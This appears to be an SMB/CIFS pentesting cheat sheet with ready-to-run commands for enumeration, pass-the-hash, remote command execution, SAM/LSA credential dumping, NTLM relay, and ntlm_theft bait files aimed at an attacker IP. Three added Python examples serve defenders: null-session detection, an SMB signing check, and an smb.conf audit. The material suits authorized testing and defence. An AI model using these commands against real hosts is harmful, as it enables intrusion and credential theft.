SMB (Server Message Block) / CIFS (Common Internet File System) is a client-server protocol for shared access to files, printers, and other network resources. Port 445 carries SMB directly over TCP/IP; port 139 carries SMB over the NetBIOS session service (NetBIOS over TCP).

Server Enumeration

# Scan network for SMB hosts
nbtscan -r 192.168.0.1/24

# SMB version
msf> use auxiliary/scanner/smb/smb_version

# Comprehensive enumeration
enum4linux -a <IP>
enum4linux-ng -A <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

Null Session Enumeration

smbclient --no-pass -L //<IP>      # List shares (null user)
smbmap -H <IP>                      # Null user
smbmap -H <IP> -u null -p null
crackmapexec smb <IP> -u '' -p '' --shares

Authenticated Enumeration

smbmap -u "username" -p "password" -H <IP>
smbmap -u "username" -p "<NT>:<LM>" -H <IP>   # Pass-the-Hash

crackmapexec smb <IP> -u 'username' -p 'password' --shares
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares

# Full enum
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'pass' --users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'pass' --groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'pass' --sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'pass' --loggedon-users

RPC Enumeration

# Connect (null session)
rpcclient -U "" -N <IP>

# With credentials
rpcclient -U "username%passwd" <IP>

# Useful RPC commands
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> queryuser <RID>
rpcclient $> querydispinfo

Share Operations

# Connect to share
smbclient --no-pass //<IP>/<Share>
smbclient -U 'username%passwd' //<IP>/<Share>

# Recursive list
smbclient --no-pass -c 'recurse;ls' //<IP>/<Share>
smbmap -R -u "username" -p "password" -H <IP>

# Download all files
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *

# Mount share
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=pass" //x.x.x.x/share /mnt/share

Common Windows Share Names

C$, D$, ADMIN$, IPC$, PRINT$, FAX$, SYSVOL, NETLOGON

Enumerate Users via Lookupsid / RID Brute Force

lookupsid.py -no-pass hostname.local

# One-liner
for i in $(seq 500 1100); do \
  rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" \
  | grep "User Name\|user_rid\|group_rid" && echo ""; \
done
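On the defending side, both the null-session enumeration above and the RID brute-force loop produce the same footprint on the target: a burst of network logons (Event ID 4624, logon type 3) and IPC$ share accesses (Event ID 5140) by the ANONYMOUS LOGON account from one source address. The following detection logic is an added example, not part of the original page; it runs over constructed sample records whose field names follow the Windows Security event XML (EventID, TargetUserName, LogonType, IpAddress, ShareName) but whose values are invented for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

ANONYMOUS = "ANONYMOUS LOGON"

# Constructed sample records (not from any real host). 10.10.10.50 performs a
# burst of anonymous logons and an IPC$ access; 10.10.10.20 is a normal user with
# a single anonymous logon, which is common and should not be flagged on its own.
SAMPLE_EVENTS = [
    {"time": f"2024-05-01T10:00:{s:02d}", "EventID": 4624, "TargetUserName": ANONYMOUS,
     "LogonType": 3, "IpAddress": "10.10.10.50"} for s in range(0, 10, 2)
] + [
    {"time": "2024-05-01T10:00:01", "EventID": 5140, "TargetUserName": ANONYMOUS,
     "IpAddress": "10.10.10.50", "ShareName": "\\\\*\\IPC$"},
    {"time": "2024-05-01T10:01:00", "EventID": 4624, "TargetUserName": "jsmith",
     "LogonType": 3, "IpAddress": "10.10.10.20"},
    {"time": "2024-05-01T10:01:05", "EventID": 4624, "TargetUserName": ANONYMOUS,
     "LogonType": 3, "IpAddress": "10.10.10.20"},
]


def is_null_session_event(ev):
    """True for a network logon (type 3) or an IPC$ share access by the anonymous account."""
    if ev.get("TargetUserName", "").upper() != ANONYMOUS:
        return False
    if ev["EventID"] == 4624:
        return ev.get("LogonType") == 3
    if ev["EventID"] == 5140:
        return ev.get("ShareName", "").upper().endswith("IPC$")
    return False


def find_null_session_sources(events, threshold=5, window=timedelta(minutes=5)):
    """Return {source_ip: total_count} for sources with at least `threshold`
    anonymous SMB events inside any sliding `window`."""
    per_ip = defaultdict(list)
    for ev in events:
        if is_null_session_event(ev):
            per_ip[ev["IpAddress"]].append(datetime.fromisoformat(ev["time"]))

    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Shrink the window from the left until it spans at most `window`.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


if __name__ == "__main__":
    for ip, count in find_null_session_sources(SAMPLE_EVENTS).items():
        print(f"{ip}: {count} anonymous SMB events in window, possible null-session enumeration")
```

The threshold and window are tuning knobs: a single ANONYMOUS LOGON is routine on many networks, whereas a RID sweep of RIDs 500 to 1100 generates hundreds of such events in seconds. The mitigation that removes the signal entirely is restricting anonymous access (the RestrictAnonymous / RestrictAnonymousSAM policies) on the server side.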

Kerberos Authentication

smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com

# NetExec with Kerberos
sudo ntpdate <dc.fqdn>           # Sync time
netexec smb <dc.fqdn> -k

Command Execution

# crackmapexec (multiple methods)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami
# Methods: --exec-method {mmcexec,smbexec,atexec,wmiexec}

# psexec.py (Impacket)
./psexec.py [[domain/]username[:password]@]<target>
./psexec.py -hashes <LM:NT> <username>@<target>

# wmiexec.py (Impacket)
./wmiexec.py [[domain/]username[:password]@]<target>
./wmiexec.py -hashes <LM:NT> <username>@<target>

# atexec.py - Task Scheduler
./atexec.py [[domain/]username[:password]@]<target> "command"

SAM and LSASS Dumping

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa

SYSVOL Share Exploitation

The SYSVOL share is readable by all authenticated domain users. It often contains batch, VBScript, and PowerShell scripts with credentials. If writable, you can poison logon scripts for RCE at user logon.

# Check writability
smbclient //<DC>/SYSVOL -U 'DOMAIN\user%pass'
> ls
# Try uploading a small file to test write permissions

SMB Relay Attack

# Requires Responder for capture
responder -I eth0 -wrf

# Then relay captured hash to target
ntlmrelayx.py -tf targets.txt -smb2support

# See more: spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks
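The relay above only works against hosts that do not require SMB signing, which is why the first thing a defender checks is the SecurityMode the server advertises in its SMB2 NEGOTIATE response (SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001, SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002, as defined in MS-SMB2). The parser below is an added example, not part of the original page or of any tool it names; it builds a constructed NEGOTIATE response so it can run offline, and the `relay_exposure` helper and its wording are this example's own.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001   # header flag: message is a response
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}


def build_negotiate_response(security_mode, dialect=0x0311):
    """Construct a minimal SMB2 NEGOTIATE response (64-byte header + 64-byte fixed
    body) for testing the parser offline. Fields irrelevant here are zero."""
    header = SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ16s",
        64,                          # StructureSize
        0,                           # CreditCharge
        0,                           # Status
        SMB2_NEGOTIATE,              # Command
        1,                           # CreditResponse
        SMB2_FLAGS_SERVER_TO_REDIR,  # Flags
        0, 0, 0, 0, 0,               # NextCommand, MessageId, Reserved, TreeId, SessionId
        b"\x00" * 16,                # Signature
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65,                      # StructureSize (64 fixed bytes + 1 byte of variable buffer)
        security_mode,           # SecurityMode
        dialect,                 # DialectRevision
        0,                       # NegotiateContextCount
        b"\x11" * 16,            # ServerGuid (arbitrary for the sample)
        0, 65536, 65536, 65536,  # Capabilities, MaxTransact/Read/WriteSize
        0, 0,                    # SystemTime, ServerStartTime
        0, 0,                    # SecurityBufferOffset/Length (no SPNEGO blob in the sample)
        0,                       # NegotiateContextOffset
    )
    return header + body


def parse_negotiate_response(packet):
    """Extract dialect and signing policy from an SMB2 NEGOTIATE response."""
    # A raw capture from TCP/445 carries a 4-byte NetBIOS session length prefix; strip it.
    if packet[:4] != SMB2_MAGIC and packet[4:8] == SMB2_MAGIC:
        packet = packet[4:]
    if len(packet) < 64 + 6 or packet[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    command, = struct.unpack_from("<H", packet, 12)
    flags, = struct.unpack_from("<I", packet, 16)
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", packet, 64)
    if struct_size != 65:
        raise ValueError(f"unexpected NEGOTIATE response StructureSize {struct_size}")
    return {
        "dialect": DIALECTS.get(dialect, hex(dialect)),
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def relay_exposure(packet):
    """Classify a host: only 'signing required' defeats relayed NTLM sessions."""
    info = parse_negotiate_response(packet)
    if info["signing_required"]:
        return f"signing required (SMB {info['dialect']}): relayed sessions are rejected"
    return f"signing not required (SMB {info['dialect']}): enforce signing to close the relay path"


if __name__ == "__main__":
    # Constructed samples: a workstation-style host (signing enabled, not required)
    # and a domain-controller-style host (signing required).
    print(relay_exposure(build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED)))
    print(relay_exposure(build_negotiate_response(
        SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED)))
```

"Signing enabled" alone is the Windows workstation default and does not stop a relay; the policy to enforce is "Microsoft network server: Digitally sign communications (always)" on the servers, which flips the REQUIRED bit in this response.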

NTLM Theft

# Plant malicious files to trigger NTLM auth
# ntlm_theft generates SCF, LNK, DOC, PDF files
python3 ntlm_theft.py -g all -s <attacker_ip> -f loot

ShareHound (BloodHound SMB Collector)

sharehound -ai "10.0.100.201" -au "user" -ap "Test123!" \
  -ns "10.0.100.201" -rf "rules/skip_common_shares.shareql"

# BloodHound queries for interesting share access
# Find principals with write access on shares:
# MATCH x=(p)-[r:CanWriteDacl|CanWriteOwner|CanDsWriteProperty]->(s:NetworkShareSMB) RETURN x

SMB Version Vulnerabilities

# Check for EternalBlue (MS17-010)
nmap -p 139,445 -vv -Pn --script=smb-vuln-ms17-010 <IP>
nmap -p 139,445 --script 'smb-vuln*' -Pn <IP>

# MSF
msf> search type:exploit platform:windows target:2008 smb

Post-Exploitation: Samba Config

# Default config location
/etc/samba/smb.conf

# Check active connections
smbstatus

Dangerous Samba settings:
  • guest ok = yes — allow unauthenticated access
  • writable = yes + create mask = 0777 — world-writable shares
  • logon script = script.sh — execute scripts on login
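The three settings above are easy to spot by hand in a short file but easy to miss across dozens of shares, and Samba accepts several spellings for each (`public` for `guest ok`, `writeable`/`write ok`/`read only = no` for `writable`, `create mode` for `create mask`). The auditor below is an added example, not part of the original page or of Samba itself; it reads a constructed sample smb.conf and reports every share that matches one of the listed dangerous patterns, using Samba's documented defaults (`read only = yes`, `create mask = 0744`) where a key is absent.

```python
import configparser

# Constructed sample smb.conf for this example (not from any real host).
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[public]
   path = /srv/public
   guest ok = yes
   writable = yes
   create mask = 0777

[netlogon]
   path = /srv/netlogon
   logon script = logon.bat
   read only = yes

[homes]
   path = /home/%U
   read only = no
   create mask = 0644
"""


def _truthy(value):
    return value.strip().lower() in ("yes", "true", "1")


def _writable(share):
    """Resolve the share's effective write setting across Samba's synonyms."""
    for key in ("writable", "writeable", "write ok"):
        if key in share:
            return _truthy(share[key])
    if "read only" in share:
        return not _truthy(share["read only"])
    return False  # Samba default: read only = yes


def audit_smb_conf(text):
    """Return (share, finding) pairs for the dangerous settings listed on this page."""
    # smb.conf is INI-like; interpolation is off because values contain '%U'-style macros.
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    findings = []
    for name in cp.sections():
        share = cp[name]
        if _truthy(share.get("guest ok", share.get("public", "no"))):
            findings.append((name, "guest ok = yes: unauthenticated access"))
        mask = share.get("create mask", share.get("create mode", "0744"))
        if _writable(share) and int(mask, 8) & 0o002:
            findings.append((name, f"writable share with world-writable create mask {mask}"))
        if share.get("logon script"):
            findings.append((name, f"logon script = {share['logon script']}: runs on each client logon"))
    return findings


if __name__ == "__main__":
    for share, finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{share}] {finding}")
```

The [homes] share is writable but its 0644 create mask keeps files private to their owner, so it is not reported; [public] is reported twice. Run it against a live system's /etc/samba/smb.conf after `testparm -s`, which prints the effective configuration with includes resolved.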
